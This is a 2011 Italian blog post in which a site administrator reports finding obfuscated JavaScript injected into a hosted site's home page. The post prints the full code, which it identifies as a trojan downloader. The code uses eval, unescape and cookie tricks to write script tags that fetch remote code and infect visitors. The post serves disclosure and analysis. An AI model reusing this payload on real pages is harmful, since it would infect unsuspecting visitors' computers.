Codice malevolo su un sito Web: hosting di Aruba crackato?

Recentemente, su uno dei siti che ho realizzato e che gestisco ho trovato il seguente codice javascrip presente all’interno della home page (ho provato a sistemarlo in modo da renderlo più leggibile):

<scrip language="javascrip">

var kasbd3412 = "";

$$ = function () {

try {

kasbd3412= $$dfsd(gnflseejrr());

kasbd3412.do();

}

catch(e) {

var bn = "";

return kasbd3412;

}

};

var adlan3r$oubw = "e";

$$dfsd =  this['a'+'s'+'d'];

var adlan3r$ouaw = "a";

function asd(df_){

this['r']="";

var s = df_;

for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ) {

i=__fh;

if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z') {

this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'}

else {

this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])

}

this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)

}

return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)

}

var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];});


VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);});

function gnflseejrr() {

return $a

}

var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1';

BKbk34b32='Z63aZ3dZ22Z2566unZ2563tioZ256e Z2564csZ2528dsZ252cesZ2529Z257bdZ2573Z253dunesZ2563apeZ25Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;cdZ3dZ22Z2574Z253dst+Z2553Z2574rinZ2567.frZ256fmCZ2568aZ2572CZ256fdZ2565(Z2528tmpZ252eZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564cZ252bdZ2564Z252bZ2564eZ252c1Z2530Z2529Z253bZ2564wZ2528Z2573tZ2529Z253bsZ2574Z253d$Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uZ256eZ2563tZ2569on Z2563z(cZ257a)Z257breZ2574urnZ2520cZ2561+cZ2562+ccZ252bZ2563d+cZ2565+cZ257aZ253bZ257dZ253bZ22;opZ3dZ22Z2524aZ253dZ2522dZ2577(dcZ2573(cZ2575,14Z2529);Z2522;Z22;ceZ3dZ22chaZ2572CoZ2564eAtZ25280)Z255eZ2528Z25270x0Z2530Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cbZ3dZ2228dsZ2529;sZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cdZ2573Z252elZ2565nZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566Z2575nctZ2569oZ256e dwZ2528Z2574)Z257bcaZ253dZ2527Z252564oZ2563Z252575meZ25256eZ2574.Z252577rZ252569Z2574e(Z25252Z2532Z2527Z253bZ2563Z2565Z253dZ2527Z252522Z252529Z2527;cbZ253dZ2527Z25253csZ252563riZ2525Z25370Z25257Z2534 lZ2525Z25361Z25256Z2565Z2567uaZ252567Z252565Z25253Z2564Z25255cZ252522Z256aZ252561Z2576asZ252563rZ2569Z2525Z25370Z252574Z25255Z2563Z252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fsZ2563ripZ2574Z2525Z2533eZ2527;windZ256fw[Z2522Z2565Z2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](uneZ2573Z2563aZ2570Z2565(tZ2529)};Z22;ccZ3dZ22Z2567Z2574h;Z2569++Z2529Z257btZ256dpZ253dds.sZ256cicZ2565(iZ252ci+1Z2529;Z2573Z22;Z69f (Z64Z6fcuZ6denZ74.Z63Z6foZ6bieZ2eindZ65xOfZ28Z27rZ66Z35f6Z64Z73Z27)Z3dZ3d-1Z29Z7bfZ75ncZ74ionZ20cZ61lZ6cZ62aZ63kZ28Z78)Z7bwinZ64Z6fw.tZ77Z20Z3d Z78;Z76Z61r dZ20Z3d new DZ61tZ65()Z3bdZ2esetZ54imeZ28Z78[Z22aZ73Z5foZ66Z22]*1Z3000Z29;vaZ72 hZ20Z3d d.Z67Z65tUZ54CHZ6fursZ28)Z3bwiZ6eZ64ow.Z68 Z3d hZ3bZ69Z66 Z28h Z3e Z38)Z7bd.Z73Z65tUTZ43DZ61tZ65Z28Z64.geZ74UTZ43Z44atZ65Z28) Z2dZ202Z29Z3b}elZ73Z65Z7bd.sZ65tUTZ43DaZ74eZ28Z64.Z67etUZ54CDZ61te(Z29 -Z203Z29Z3b}wZ69nZ64owZ2egdZ20Z3dZ20d;vZ61Z72 Z74iZ6de Z3d neZ77 ArZ72Z61y(Z29Z3bZ76Z61r Z73hZ69ftIZ6edZ65x Z3d Z22Z22;timeZ5bZ22yearZ22] Z3d d.gZ65tUZ54CFuZ6clZ59eZ61r()Z3btiZ6deZ5bZ22moZ6etZ68Z22] Z3d d.Z67Z65tZ55TZ43Z4donZ74Z68Z28Z29+Z31Z3btiZ6deZ5bZ22dayZ22] Z3d Z64.Z67etZ55TCZ44ateZ28);Z69f Z28d.gZ65Z74Z55TZ43MonZ74hZ28)+Z31 Z3c 1Z30Z29Z7bshiZ66tInZ64Z65Z78 Z3d tiZ6de[Z22Z79earZ22] +Z20Z22-0Z22 + (Z64.geZ74UZ54CMZ6fnthZ28Z29+Z31);}Z65Z6cseZ7bshZ69Z66tInZ64ex Z3d tZ69mZ65Z5bZ22Z79earZ22Z5d Z2bZ20Z22-Z22 + (dZ2eZ67etZ55TCZ4donZ74h()Z2b1);Z7difZ20Z28d.Z67etUZ54CDaZ74e()Z20Z3cZ20Z310)Z7bsZ68ifZ74InZ64ex Z3dshiZ66tZ49nZ64Z65Z78Z20+Z20Z22-Z30Z22 +Z20dZ2egeZ74UZ54Z43DatZ65();Z7deZ6cseZ7bshiZ66Z74InZ64ex Z3d sZ68ifZ74IZ6eZ64exZ20+Z20Z22-Z22 + dZ2egetZ55TCZ44ateZ28)Z3b}Z64Z6fcumZ65nt.Z77Z72iZ74e(Z22Z3csZ63rZ22+Z22ipt Z6cZ61Z6eZ67Z75Z61Z67eZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27htZ74pZ3aZ2fZ2fsearch.tZ77ittZ65rZ2ecomZ2fZ74reZ6edZ73Z2fdailZ79.jsZ6fZ6eZ3fdaZ74Z65Z3dZ22+ Z73Z68Z69fZ74InZ64ex+Z22Z26cZ61llZ62aZ63Z6bZ3dcalZ6cbacZ6b2Z27Z3eZ22 +Z20Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7d Z66Z75Z6ectiZ6fn cZ61Z6clbaZ63Z6b2Z28x)Z7bZ77inZ64oZ77.tZ77 Z3dZ20x;Z73c(Z27Z72f5fZ36dsZ27,2,7Z29Z3beZ76aZ6c(unZ65sZ63aZ70e(dZ7aZ2bczZ2bZ6fp+Z73t)Z2bZ27dw(Z64zZ2bcZ7a($Z61Z2bZ73t))Z3bZ27);docZ75menZ74.Z77rZ69te(Z24Z61);}Z64ocuZ6denZ74.wZ72itZ65(Z22Z3cimg srZ63Z3dZ27httZ70:Z2fZ2fsearZ63hZ2etwiZ74Z74Z65r.cZ6fmZ2fimaZ67esZ2fseaZ72chZ2frsZ73.pZ6egZ27 wZ69dtZ68Z3d1 heZ69gZ68tZ3d1 Z73tyZ6ceZ3dZ27visiZ62Z69liZ74y:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djavaZ73crZ69ptZ22+Z22 sZ72cZ3dZ27httZ70:Z2fZ2fsearZ63Z68.Z74wiZ74Z74erZ2ecZ6fmZ2ftrZ65nZ64Z73Z2fdailZ79Z2ejZ73on?Z63aZ6clbZ61cZ6bZ3dcalZ6cbZ61cZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};function Z73c(cZ6em,vZ2cedZ29Z7bvarZ20eZ78dZ3dnewZ20DZ61Z74eZ28);eZ78Z64.seZ74DatZ65(Z65xdZ2egetZ44atZ65()+Z65dZ29Z3bdoZ63umZ65nZ74Z2ecZ6fokZ69Z65Z3dZ63nZ6d+ Z27Z3dZ27 +escapZ65(vZ29+Z27;exZ70iZ72esZ3dZ27+exd.toZ47MZ54StZ72iZ6eg()Z3b};';

var $a = BKbk34b32.replace(/98/g, "Z");

ez[String.fromCharCode(101,118,97)+'l']($$())

</scrip>

Trattasi sicuramente di un trojan che mediante del codice lato client prova ad infettare il PC dell’ignaro visitatore. In particolare, l’antivirus segnala il seguente codice malicious: JS/trojandownloader.twetti.nac

Nei prossimi giorni procederò con l’analisi e la deoffuscamento del codice, stay tuned.

Codice malevolo su un sito Web: hosting di Aruba crackato?ultima modifica: 2011-01-20T11:43:21+01:00da nazarenolatella
Reposta per primo quest’articolo

Un pensiero su “Codice malevolo su un sito Web: hosting di Aruba crackato?

Lascia un commento